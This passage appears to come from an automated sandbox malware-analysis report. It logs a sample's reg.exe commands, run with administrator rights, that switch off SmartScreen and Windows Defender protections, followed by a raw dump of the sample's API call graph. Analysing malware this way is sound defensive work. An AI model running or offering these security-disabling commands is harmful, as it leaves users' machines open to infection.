                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:28
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:29
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:30
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:31
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:32
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:33
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:34
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:36
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:37
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:38
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:39
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:40
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:41
                                                Start time:03:53:17
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:42
                                                Start time:03:53:17
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:43
                                                Start time:03:53:17
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:15%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.5%
                                                  Total number of Nodes:1356
                                                  Total number of Limit Nodes:23
                                                  execution_graph: call-graph data rendered as a figure in the original report (numbered nodes labelled with function addresses in the 0x401000-0x406fff range and the Win32 APIs they reach, among them ReadFile, WriteFile, SetFilePointer, FindFirstFileW, FindNextFileW, DeleteFileW, MoveFileExW, lstrcpynW, GetProcAddress, LoadLibraryExW, CreateFontIndirectW, ShellExecuteExW, OpenClipboard, SetFileTime and MessageBoxIndirectW); the raw node and edge listing is not reproduced as text.
3987->3987 3988 405a67 GlobalUnlock SetClipboardData CloseClipboard 3987->3988 3988->3970 3989->3950 3990->3977 3991->3951 3993 404493 3992->3993 3994 404499 SendMessageW 3992->3994 3993->3994 3994->3952 3995 4023f9 3996 402dab 21 API calls 3995->3996 3997 402408 3996->3997 3998 402dab 21 API calls 3997->3998 3999 402411 3998->3999 4000 402dab 21 API calls 3999->4000 4001 40241b GetPrivateProfileStringW 4000->4001 4002 404cfa 4003 404d26 4002->4003 4004 404d0a 4002->4004 4006 404d59 4003->4006 4007 404d2c SHGetPathFromIDListW 4003->4007 4013 405b78 GetDlgItemTextW 4004->4013 4009 404d43 SendMessageW 4007->4009 4010 404d3c 4007->4010 4008 404d17 SendMessageW 4008->4003 4009->4006 4011 40140b 2 API calls 4010->4011 4011->4009 4013->4008 4014 401ffb 4015 402dab 21 API calls 4014->4015 4016 402002 4015->4016 4017 406891 2 API calls 4016->4017 4018 402008 4017->4018 4020 402019 4018->4020 4021 40647b wsprintfW 4018->4021 4021->4020 4022 401b7c 4023 402dab 21 API calls 4022->4023 4024 401b83 4023->4024 4025 402d89 21 API calls 4024->4025 4026 401b8c wsprintfW 4025->4026 4027 402c2f 4026->4027 4028 401000 4029 401037 BeginPaint GetClientRect 4028->4029 4031 40100c DefWindowProcW 4028->4031 4032 4010f3 4029->4032 4033 401179 4031->4033 4034 401073 CreateBrushIndirect FillRect DeleteObject 4032->4034 4035 4010fc 4032->4035 4034->4032 4036 401102 CreateFontIndirectW 4035->4036 4037 401167 EndPaint 4035->4037 4036->4037 4038 401112 6 API calls 4036->4038 4037->4033 4038->4037 4039 401680 4040 402dab 21 API calls 4039->4040 4041 401687 4040->4041 4042 402dab 21 API calls 4041->4042 4043 401690 4042->4043 4044 402dab 21 API calls 4043->4044 4045 401699 MoveFileW 4044->4045 4046 4016a5 4045->4046 4047 4016ac 4045->4047 4049 401423 28 API calls 4046->4049 4048 406891 2 API calls 4047->4048 4051 4022fb 4047->4051 4050 4016bb 4048->4050 4049->4051 4050->4051 4052 4062f4 40 API calls 4050->4052 4052->4046 4053 401503 4054 401508 4053->4054 4056 401520 4053->4056 4055 402d89 21 API 
calls 4054->4055 4055->4056 4057 401a04 4058 402dab 21 API calls 4057->4058 4059 401a0b 4058->4059 4060 402dab 21 API calls 4059->4060 4061 401a14 4060->4061 4062 401a1b lstrcmpiW 4061->4062 4063 401a2d lstrcmpW 4061->4063 4064 401a21 4062->4064 4063->4064 4065 402304 4066 402dab 21 API calls 4065->4066 4067 40230a 4066->4067 4068 402dab 21 API calls 4067->4068 4069 402313 4068->4069 4070 402dab 21 API calls 4069->4070 4071 40231c 4070->4071 4072 406891 2 API calls 4071->4072 4073 402325 4072->4073 4074 402336 lstrlenW lstrlenW 4073->4074 4075 402329 4073->4075 4077 4055b9 28 API calls 4074->4077 4076 4055b9 28 API calls 4075->4076 4079 402331 4075->4079 4076->4079 4078 402374 SHFileOperationW 4077->4078 4078->4075 4078->4079 4080 401d86 4081 401d99 GetDlgItem 4080->4081 4082 401d8c 4080->4082 4083 401d93 4081->4083 4084 402d89 21 API calls 4082->4084 4085 401dda GetClientRect LoadImageW SendMessageW 4083->4085 4086 402dab 21 API calls 4083->4086 4084->4083 4088 401e38 4085->4088 4090 401e44 4085->4090 4086->4085 4089 401e3d DeleteObject 4088->4089 4088->4090 4089->4090 4091 402388 4092 4023a2 4091->4092 4093 40238f 4091->4093 4094 406571 21 API calls 4093->4094 4095 40239c 4094->4095 4096 405b94 MessageBoxIndirectW 4095->4096 4096->4092 3372 401389 3374 401390 3372->3374 3373 4013fe 3374->3373 3375 4013cb MulDiv SendMessageW 3374->3375 3375->3374 4097 402c0a SendMessageW 4098 402c24 InvalidateRect 4097->4098 4099 402c2f 4097->4099 4098->4099 3413 40350f SetErrorMode GetVersionExW 3414 403563 GetVersionExW 3413->3414 3415 40359b 3413->3415 3414->3415 3416 4035f2 3415->3416 3417 406928 5 API calls 3415->3417 3418 4068b8 3 API calls 3416->3418 3417->3416 3419 403608 lstrlenA 3418->3419 3419->3416 3420 403618 3419->3420 3421 406928 5 API calls 3420->3421 3422 40361f 3421->3422 3423 406928 5 API calls 3422->3423 3424 403626 3423->3424 3425 406928 5 API calls 3424->3425 3426 403632 #17 OleInitialize SHGetFileInfoW 3425->3426 3501 406534 lstrcpynW 3426->3501 3429 403681 
GetCommandLineW 3502 406534 lstrcpynW 3429->3502 3431 403693 3432 405e30 CharNextW 3431->3432 3433 4036b9 CharNextW 3432->3433 3441 4036cb 3433->3441 3434 4037cd 3435 4037e1 GetTempPathW 3434->3435 3503 4034de 3435->3503 3437 4037f9 3438 403853 DeleteFileW 3437->3438 3439 4037fd GetWindowsDirectoryW lstrcatW 3437->3439 3513 403082 GetTickCount GetModuleFileNameW 3438->3513 3442 4034de 12 API calls 3439->3442 3440 405e30 CharNextW 3440->3441 3441->3434 3441->3440 3447 4037cf 3441->3447 3444 403819 3442->3444 3444->3438 3446 40381d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3444->3446 3445 403867 3448 403a5a ExitProcess OleUninitialize 3445->3448 3453 40390e 3445->3453 3454 405e30 CharNextW 3445->3454 3450 4034de 12 API calls 3446->3450 3598 406534 lstrcpynW 3447->3598 3451 403a90 3448->3451 3452 403a6c 3448->3452 3458 40384b 3450->3458 3455 403b14 ExitProcess 3451->3455 3456 403a98 GetCurrentProcess OpenProcessToken 3451->3456 3459 405b94 MessageBoxIndirectW 3452->3459 3541 403c06 3453->3541 3469 403886 3454->3469 3460 403ab0 LookupPrivilegeValueW AdjustTokenPrivileges 3456->3460 3461 403ae4 3456->3461 3458->3438 3458->3448 3464 403a7a ExitProcess 3459->3464 3460->3461 3465 406928 5 API calls 3461->3465 3466 403aeb 3465->3466 3471 403b00 ExitWindowsEx 3466->3471 3474 403b0d 3466->3474 3467 4038e4 3472 405f0b 18 API calls 3467->3472 3468 403927 3470 405aff 5 API calls 3468->3470 3469->3467 3469->3468 3473 40392c lstrlenW 3470->3473 3471->3455 3471->3474 3475 4038f0 3472->3475 3601 406534 lstrcpynW 3473->3601 3606 40140b 3474->3606 3475->3448 3599 406534 lstrcpynW 3475->3599 3478 403946 3480 40395e 3478->3480 3602 406534 lstrcpynW 3478->3602 3484 403984 wsprintfW 3480->3484 3488 4039b0 3480->3488 3481 403903 3600 406534 lstrcpynW 3481->3600 3485 406571 21 API calls 3484->3485 3485->3480 3486 405a88 2 API calls 3486->3488 3487 405ae2 2 API calls 3487->3488 3488->3480 3488->3484 3488->3486 3488->3487 3489 4039c0 GetFileAttributesW 3488->3489 
3490 4039fa SetCurrentDirectoryW 3488->3490 3494 405c40 71 API calls 3488->3494 3495 4039f8 3488->3495 3496 4062f4 40 API calls 3488->3496 3497 406571 21 API calls 3488->3497 3499 403a82 CloseHandle 3488->3499 3500 406891 2 API calls 3488->3500 3603 405b17 CreateProcessW 3488->3603 3489->3488 3491 4039cc DeleteFileW 3489->3491 3492 4062f4 40 API calls 3490->3492 3491->3488 3493 403a09 CopyFileW 3492->3493 3493->3488 3493->3495 3494->3488 3495->3448 3496->3488 3497->3488 3499->3495 3500->3488 3501->3429 3502->3431 3504 4067e2 5 API calls 3503->3504 3506 4034ea 3504->3506 3505 4034f4 3505->3437 3506->3505 3507 405e03 3 API calls 3506->3507 3508 4034fc 3507->3508 3509 405ae2 2 API calls 3508->3509 3510 403502 3509->3510 3511 406053 2 API calls 3510->3511 3512 40350d 3511->3512 3512->3437 3609 406024 GetFileAttributesW CreateFileW 3513->3609 3515 4030c2 3533 4030d2 3515->3533 3610 406534 lstrcpynW 3515->3610 3517 4030e8 3518 405e4f 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 406534 lstrcpynW 3519->3611 3521 4030f9 GetFileSize 3522 4031f3 3521->3522 3535 403110 3521->3535 3612 40301e 3522->3612 3524 4031fc 3526 40322c GlobalAlloc 3524->3526 3524->3533 3624 4034c7 SetFilePointer 3524->3624 3525 4034b1 ReadFile 3525->3535 3623 4034c7 SetFilePointer 3526->3623 3528 40325f 3532 40301e 6 API calls 3528->3532 3530 403215 3534 4034b1 ReadFile 3530->3534 3531 403247 3536 4032b9 35 API calls 3531->3536 3532->3533 3533->3445 3537 403220 3534->3537 3535->3522 3535->3525 3535->3528 3535->3533 3538 40301e 6 API calls 3535->3538 3539 403253 3536->3539 3537->3526 3537->3533 3538->3535 3539->3533 3539->3539 3540 403290 SetFilePointer 3539->3540 3540->3533 3542 406928 5 API calls 3541->3542 3543 403c1a 3542->3543 3544 403c20 GetUserDefaultUILanguage 3543->3544 3545 403c32 3543->3545 3629 40647b wsprintfW 3544->3629 3547 406402 3 API calls 3545->3547 3549 403c62 3547->3549 3548 403c30 3630 403edc 3548->3630 3550 403c81 lstrcatW 3549->3550 3551 406402 3 API calls 3549->3551 
3550->3548 3551->3550 3554 405f0b 18 API calls 3555 403cb3 3554->3555 3556 403d47 3555->3556 3558 406402 3 API calls 3555->3558 3557 405f0b 18 API calls 3556->3557 3559 403d4d 3557->3559 3560 403ce5 3558->3560 3561 403d5d LoadImageW 3559->3561 3562 406571 21 API calls 3559->3562 3560->3556 3565 403d06 lstrlenW 3560->3565 3569 405e30 CharNextW 3560->3569 3563 403e03 3561->3563 3564 403d84 RegisterClassW 3561->3564 3562->3561 3568 40140b 2 API calls 3563->3568 3566 40391e 3564->3566 3567 403dba SystemParametersInfoW CreateWindowExW 3564->3567 3570 403d14 lstrcmpiW 3565->3570 3571 403d3a 3565->3571 3566->3448 3567->3563 3572 403e09 3568->3572 3573 403d03 3569->3573 3570->3571 3574 403d24 GetFileAttributesW 3570->3574 3575 405e03 3 API calls 3571->3575 3572->3566 3577 403edc 22 API calls 3572->3577 3573->3565 3576 403d30 3574->3576 3578 403d40 3575->3578 3576->3571 3579 405e4f 2 API calls 3576->3579 3580 403e1a 3577->3580 3638 406534 lstrcpynW 3578->3638 3579->3571 3582 403e26 ShowWindow 3580->3582 3583 403ea9 3580->3583 3584 4068b8 3 API calls 3582->3584 3639 40568c OleInitialize 3583->3639 3586 403e3e 3584->3586 3588 403e4c GetClassInfoW 3586->3588 3591 4068b8 3 API calls 3586->3591 3587 403eaf 3589 403eb3 3587->3589 3590 403ecb 3587->3590 3593 403e60 GetClassInfoW RegisterClassW 3588->3593 3594 403e76 DialogBoxParamW 3588->3594 3589->3566 3595 40140b 2 API calls 3589->3595 3592 40140b 2 API calls 3590->3592 3591->3588 3592->3566 3593->3594 3596 40140b 2 API calls 3594->3596 3595->3566 3597 403e9e 3596->3597 3597->3566 3598->3435 3599->3481 3600->3453 3601->3478 3602->3480 3604 405b56 3603->3604 3605 405b4a CloseHandle 3603->3605 3604->3488 3605->3604 3607 401389 2 API calls 3606->3607 3608 401420 3607->3608 3608->3455 3609->3515 3610->3517 3611->3521 3613 403027 3612->3613 3614 40303f 3612->3614 3615 403030 DestroyWindow 3613->3615 3616 403037 3613->3616 3617 403047 3614->3617 3618 40304f GetTickCount 3614->3618 3615->3616 3616->3524 3625 406964 3617->3625 3620 
403080 3618->3620 3621 40305d CreateDialogParamW ShowWindow 3618->3621 3620->3524 3621->3620 3623->3531 3624->3530 3626 406981 PeekMessageW 3625->3626 3627 40304d 3626->3627 3628 406977 DispatchMessageW 3626->3628 3627->3524 3628->3626 3629->3548 3631 403ef0 3630->3631 3646 40647b wsprintfW 3631->3646 3633 403f61 3647 403f95 3633->3647 3635 403c91 3635->3554 3636 403f66 3636->3635 3637 406571 21 API calls 3636->3637 3637->3636 3638->3556 3650 4044ff 3639->3650 3641 4056d6 3642 4044ff SendMessageW 3641->3642 3644 4056e8 OleUninitialize 3642->3644 3643 4056af 3643->3641 3653 401389 3643->3653 3644->3587 3646->3633 3648 406571 21 API calls 3647->3648 3649 403fa3 SetWindowTextW 3648->3649 3649->3636 3651 404517 3650->3651 3652 404508 SendMessageW 3650->3652 3651->3643 3652->3651 3655 401390 3653->3655 3654 4013fe 3654->3643 3655->3654 3656 4013cb MulDiv SendMessageW 3655->3656 3656->3655 4100 40248f 4101 402dab 21 API calls 4100->4101 4102 4024a1 4101->4102 4103 402dab 21 API calls 4102->4103 4104 4024ab 4103->4104 4117 402e3b 4104->4117 4107 402933 4108 4024e3 4110 4024ef 4108->4110 4113 402d89 21 API calls 4108->4113 4109 402dab 21 API calls 4112 4024d9 lstrlenW 4109->4112 4111 40250e RegSetValueExW 4110->4111 4114 4032b9 35 API calls 4110->4114 4115 402524 RegCloseKey 4111->4115 4112->4108 4113->4110 4114->4111 4115->4107 4118 402e56 4117->4118 4121 4063cf 4118->4121 4122 4063de 4121->4122 4123 4024bb 4122->4123 4124 4063e9 RegCreateKeyExW 4122->4124 4123->4107 4123->4108 4123->4109 4124->4123 4125 402910 4126 402dab 21 API calls 4125->4126 4127 402917 FindFirstFileW 4126->4127 4128 40293f 4127->4128 4131 40292a 4127->4131 4133 40647b wsprintfW 4128->4133 4130 402948 4134 406534 lstrcpynW 4130->4134 4133->4130 4134->4131 4135 401911 4136 401948 4135->4136 4137 402dab 21 API calls 4136->4137 4138 40194d 4137->4138 4139 405c40 71 API calls 4138->4139 4140 401956 4139->4140 4141 401491 4142 4055b9 28 API calls 4141->4142 4143 401498 4142->4143 4144 401914 4145 402dab 
21 API calls 4144->4145 4146 40191b 4145->4146 4147 405b94 MessageBoxIndirectW 4146->4147 4148 401924 4147->4148 4149 402896 4150 40289d 4149->4150 4151 402bae 4149->4151 4152 402d89 21 API calls 4150->4152 4153 4028a4 4152->4153 4154 4028b3 SetFilePointer 4153->4154 4154->4151 4155 4028c3 4154->4155 4157 40647b wsprintfW 4155->4157 4157->4151 4158 401f17 4159 402dab 21 API calls 4158->4159 4160 401f1d 4159->4160 4161 402dab 21 API calls 4160->4161 4162 401f26 4161->4162 4163 402dab 21 API calls 4162->4163 4164 401f2f 4163->4164 4165 402dab 21 API calls 4164->4165 4166 401f38 4165->4166 4167 401423 28 API calls 4166->4167 4168 401f3f 4167->4168 4175 405b5a ShellExecuteExW 4168->4175 4170 401f87 4172 402933 4170->4172 4176 4069d3 WaitForSingleObject 4170->4176 4173 401fa4 CloseHandle 4173->4172 4175->4170 4177 4069ed 4176->4177 4178 4069ff GetExitCodeProcess 4177->4178 4179 406964 2 API calls 4177->4179 4178->4173 4180 4069f4 WaitForSingleObject 4179->4180 4180->4177 4181 402f98 4182 402fc3 4181->4182 4183 402faa SetTimer 4181->4183 4184 403018 4182->4184 4185 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4182->4185 4183->4182 4185->4184 4186 401d1c 4187 402d89 21 API calls 4186->4187 4188 401d22 IsWindow 4187->4188 4189 401a25 4188->4189 4190 40149e 4191 4023a2 4190->4191 4192 4014ac PostQuitMessage 4190->4192 4192->4191 3041 401ba0 3042 401bf1 3041->3042 3043 401bad 3041->3043 3044 401bf6 3042->3044 3045 401c1b GlobalAlloc 3042->3045 3046 401c36 3043->3046 3051 401bc4 3043->3051 3059 4023a2 3044->3059 3079 406534 lstrcpynW 3044->3079 3060 406571 3045->3060 3047 406571 21 API calls 3046->3047 3046->3059 3049 40239c 3047->3049 3080 405b94 3049->3080 3077 406534 lstrcpynW 3051->3077 3052 401c08 GlobalFree 3052->3059 3054 401bd3 3078 406534 lstrcpynW 3054->3078 3057 401be2 3084 406534 lstrcpynW 3057->3084 3075 40657c 3060->3075 3061 4067c3 3062 4067dc 3061->3062 3107 406534 lstrcpynW 3061->3107 3062->3046 3064 406794 lstrlenW 3064->3075 3065 406571 15 API 
calls 3065->3064 3069 40668d GetSystemDirectoryW 3069->3075 3070 4066a3 GetWindowsDirectoryW 3070->3075 3071 406735 lstrcatW 3071->3075 3073 406571 15 API calls 3073->3075 3075->3061 3075->3064 3075->3065 3075->3069 3075->3070 3075->3071 3075->3073 3076 406705 SHGetPathFromIDListW CoTaskMemFree 3075->3076 3085 406402 3075->3085 3090 406928 GetModuleHandleA 3075->3090 3096 4067e2 3075->3096 3105 40647b wsprintfW 3075->3105 3106 406534 lstrcpynW 3075->3106 3076->3075 3077->3054 3078->3057 3079->3052 3081 405ba9 3080->3081 3082 405bf5 3081->3082 3083 405bbd MessageBoxIndirectW 3081->3083 3082->3059 3083->3082 3084->3059 3108 4063a1 3085->3108 3088 406436 RegQueryValueExW RegCloseKey 3089 406466 3088->3089 3089->3075 3091 406944 3090->3091 3092 40694e GetProcAddress 3090->3092 3112 4068b8 GetSystemDirectoryW 3091->3112 3094 40695d 3092->3094 3094->3075 3095 40694a 3095->3092 3095->3094 3102 4067ef 3096->3102 3097 40686a CharPrevW 3098 406865 3097->3098 3098->3097 3100 40688b 3098->3100 3099 406858 CharNextW 3099->3098 3099->3102 3100->3075 3102->3098 3102->3099 3103 406844 CharNextW 3102->3103 3104 406853 CharNextW 3102->3104 3115 405e30 3102->3115 3103->3102 3104->3099 3105->3075 3106->3075 3107->3062 3109 4063b0 3108->3109 3110 4063b4 3109->3110 3111 4063b9 RegOpenKeyExW 3109->3111 3110->3088 3110->3089 3111->3110 3113 4068da wsprintfW LoadLibraryExW 3112->3113 3113->3095 3116 405e36 3115->3116 3117 405e4c 3116->3117 3118 405e3d CharNextW 3116->3118 3117->3102 3118->3116 4193 404f20 GetDlgItem GetDlgItem 4194 404f72 7 API calls 4193->4194 4200 405197 4193->4200 4195 405019 DeleteObject 4194->4195 4196 40500c SendMessageW 4194->4196 4197 405022 4195->4197 4196->4195 4199 405059 4197->4199 4201 406571 21 API calls 4197->4201 4198 405279 4203 405325 4198->4203 4208 40518a 4198->4208 4213 4052d2 SendMessageW 4198->4213 4202 4044b3 22 API calls 4199->4202 4200->4198 4227 405206 4200->4227 4247 404e6e SendMessageW 4200->4247 4206 40503b SendMessageW SendMessageW 4201->4206 
4207 40506d 4202->4207 4204 405337 4203->4204 4205 40532f SendMessageW 4203->4205 4215 405350 4204->4215 4216 405349 ImageList_Destroy 4204->4216 4224 405360 4204->4224 4205->4204 4206->4197 4212 4044b3 22 API calls 4207->4212 4210 40451a 8 API calls 4208->4210 4209 40526b SendMessageW 4209->4198 4214 405526 4210->4214 4228 40507e 4212->4228 4213->4208 4218 4052e7 SendMessageW 4213->4218 4219 405359 GlobalFree 4215->4219 4215->4224 4216->4215 4217 4054da 4217->4208 4222 4054ec ShowWindow GetDlgItem ShowWindow 4217->4222 4221 4052fa 4218->4221 4219->4224 4220 405159 GetWindowLongW SetWindowLongW 4223 405172 4220->4223 4229 40530b SendMessageW 4221->4229 4222->4208 4225 405177 ShowWindow 4223->4225 4226 40518f 4223->4226 4224->4217 4238 40539b 4224->4238 4252 404eee 4224->4252 4245 4044e8 SendMessageW 4225->4245 4246 4044e8 SendMessageW 4226->4246 4227->4198 4227->4209 4228->4220 4230 405154 4228->4230 4234 4050d1 SendMessageW 4228->4234 4235 405123 SendMessageW 4228->4235 4236 40510f SendMessageW 4228->4236 4229->4203 4230->4220 4230->4223 4231 4053df 4239 4054a5 4231->4239 4244 405453 SendMessageW SendMessageW 4231->4244 4234->4228 4235->4228 4236->4228 4238->4231 4242 4053c9 SendMessageW 4238->4242 4240 4054b0 InvalidateRect 4239->4240 4241 4054bc 4239->4241 4240->4241 4241->4217 4261 404e29 4241->4261 4242->4231 4244->4231 4245->4208 4246->4200 4248 404e91 GetMessagePos ScreenToClient SendMessageW 4247->4248 4249 404ecd SendMessageW 4247->4249 4250 404ec5 4248->4250 4251 404eca 4248->4251 4249->4250 4250->4227 4251->4249 4264 406534 lstrcpynW 4252->4264 4254 404f01 4265 40647b wsprintfW 4254->4265 4256 404f0b 4257 40140b 2 API calls 4256->4257 4258 404f14 4257->4258 4266 406534 lstrcpynW 4258->4266 4260 404f1b 4260->4238 4267 404d60 4261->4267 4263 404e3e 4263->4217 4264->4254 4265->4256 4266->4260 4268 404d79 4267->4268 4269 406571 21 API calls 4268->4269 4270 404ddd 4269->4270 4271 406571 21 API calls 4270->4271 4272 404de8 4271->4272 4273 406571 21 API calls 
